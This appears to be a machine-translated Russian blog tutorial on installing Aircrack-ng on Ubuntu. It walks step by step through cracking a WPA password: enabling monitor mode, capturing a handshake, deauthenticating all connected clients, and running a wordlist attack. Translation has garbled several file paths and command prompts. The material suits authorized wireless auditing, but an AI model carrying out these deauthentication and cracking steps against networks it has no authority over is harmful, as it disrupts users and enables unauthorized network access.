трещина

Установите Aircrack-ng на Ubuntu

Установите Aircrack-ng на Ubuntu
Aircrack-ng - это целый набор инструментов для аудита безопасности беспроводной сети. Его можно использовать для мониторинга, тестирования, взлома или атаки протоколов безопасности беспроводной сети, таких как WEP, WPA, WPA2. Aircrack-ng основан на командной строке и доступен для Windows, Mac OS и других операционных систем на базе Unix. Пакет Aircrack-ng содержит множество инструментов, используемых для различных целей, но здесь мы рассмотрим только некоторые важные инструменты, которые чаще используются при тестировании безопасности беспроводной сети.

Airmon-ng

Airmon-ng используется для управления режимами беспроводной карты и уничтожения ненужных процессов при использовании aircrack-ng. Чтобы прослушивать беспроводное соединение, вам необходимо переключить беспроводную карту из управляемого режима в режим мониторинга, и для этой цели используется airmon-ng.

Airodump-ng

Airodump-ng - это беспроводной сниффер, который может захватывать беспроводные данные с одной или нескольких точек беспроводного доступа. Он используется для анализа ближайших точек доступа и фиксации рукопожатий.

Aireplay-ng

Aireplay-ng используется для атак повторного воспроизведения и в качестве инжектора пакетов. Это может быть деаутентификация пользователей от их точек доступа для захвата рукопожатий.

Airdecap-ng

Airdecap-ng используется для дешифрования зашифрованных беспроводных пакетов WEP, WPA / WPA2 с известным ключом.

Aircrack-ng

Aircrack-ng используется для атаки беспроводных протоколов WPA / WEP с целью поиска ключа.

Монтаж

Aircrack-ng легко установить в Ubuntu с помощью APT. Просто введите следующую команду, и будут установлены все инструменты, доступные в пакете Aircrack-ng.

sudo apt-get update
sudo apt-get install -y aircrack-ng

Применение

В этой статье мы кратко рассмотрим, как использовать aircrack-ng для взлома зашифрованной беспроводной сети (TR1CKST3R в этом примере), чтобы найти пароль.

Прежде всего, перечислите все доступные беспроводные карты, подключенные к вашему ПК, с помощью команды iwconfig.

В этом руководстве мы будем использовать именованную беспроводную карту wlxc83a35cb4546 (в вашем случае это может быть иначе). Теперь убейте все процессы, запущенные на беспроводной карте, с помощью airmon-ng.

[электронная почта защищена]: ~ $ sudo airmon-ng check kill
Запустите режим монитора на 'wlxc83a35cb4546', набрав
[электронная почта защищена]: ~ $ sudo airmon-ng start wlxc83a35cb4546

Теперь airmon-ng запустил режим мониторинга на беспроводной карте, он будет иметь другое имя wlan0mon. Снова запустите iwconfig, чтобы просмотреть сведения о беспроводной сети.

Затем используйте airodump-ng, чтобы увидеть ближайшие точки беспроводного доступа и их свойства.

[электронная почта защищена]: ~ $ sudo airodump-ng wlan0mon

Вы можете сузить поиск с помощью фильтров MAC (-bssid) и каналов (-c). Чтобы зафиксировать рукопожатие (рукопожатие содержит зашифрованный пароль), нам нужно где-то сохранить наши пакеты, используя параметр «-write». Тип,

[электронная почта защищена]: ~ $ sudo airodump-ng --bssid 6C: B7: 49: FC: 62: E4
-c 11 wlan0mon --write / tmp / рукопожатие.шапка
--bssid: MAC-адрес точки доступа
-c: канал точки доступа [1-13]
--запись: сохраняет захваченные пакеты в определенном месте

Теперь нам нужно деаутентифицировать каждое устройство из этой точки доступа с помощью утилиты Aireplay-ng. Писать

[электронная почта защищена]: ~ $ sudo aireplay-ng -0 100 -a [MAC_ADD] wlan0mon

-a: Укажите MAC-адрес точки доступа для Aireplay-ng

-0: укажите количество пакетов деаутентификации для отправки

Через некоторое время все устройства будут отключены от этой точки доступа, когда они попытаются повторно подключиться, запуск airodump-ng зафиксирует рукопожатие. Он появится в верхней части запущенного airodump-ng.

Рукопожатие хранится в каталоге '/ tmp /' и содержит зашифрованный пароль, который может быть взломан в автономном режиме с помощью словаря. Чтобы взломать пароль, мы будем использовать Aircrack-ng. Тип

[электронная почта защищена]: ~ $ sudo aircrack-ng / tmp / handshake.крышка-01.крышка -w
/ usr / share / wordlists / rockyou.текст
-w: укажите местоположение словаря

Aircrack-ng просмотрит список паролей, и, если он будет найден, отобразит пароль, используемый в качестве ключа.

В этом случае aircrack-ng обнаружил, что используется пароль '123456789'.

Теперь остановите режим монитора на беспроводной карте и перезапустите сетевой менеджер.

[электронная почта защищена]: ~ $ sudo airmon-ng stop wlan0mon
[электронная почта защищена]: ~ $ sudo service network-manager restart

Заключение

Aircrack-ng можно использовать для аудита безопасности беспроводной сети или для взлома забытых паролей. Для этой цели доступны и другие похожие инструменты, такие как Kismet, но aircrack-ng более известен своей хорошей поддержкой, универсальностью и широким набором инструментов. Он имеет простой в использовании интерфейс командной строки, который можно легко автоматизировать с помощью любого языка сценариев, например Python.

Лучшие приложения для сопоставления геймпадов для Linux
Если вам нравится играть в игры на Linux с помощью геймпада вместо стандартной системы ввода с клавиатуры и мыши, для вас есть несколько полезных прил...
Полезные инструменты для геймеров Linux
Если вам нравится играть в игры на Linux, скорее всего, вы использовали приложения и утилиты, такие как Wine, Lutris и OBS Studio, для улучшения игров...
Игры HD Remastered для Linux, ранее не выпускавшиеся для Linux
Многие разработчики и издатели игр придумывают HD-ремастеры старых игр, чтобы продлить жизнь франшизы, порадовать фанатов, требующих совместимости с с...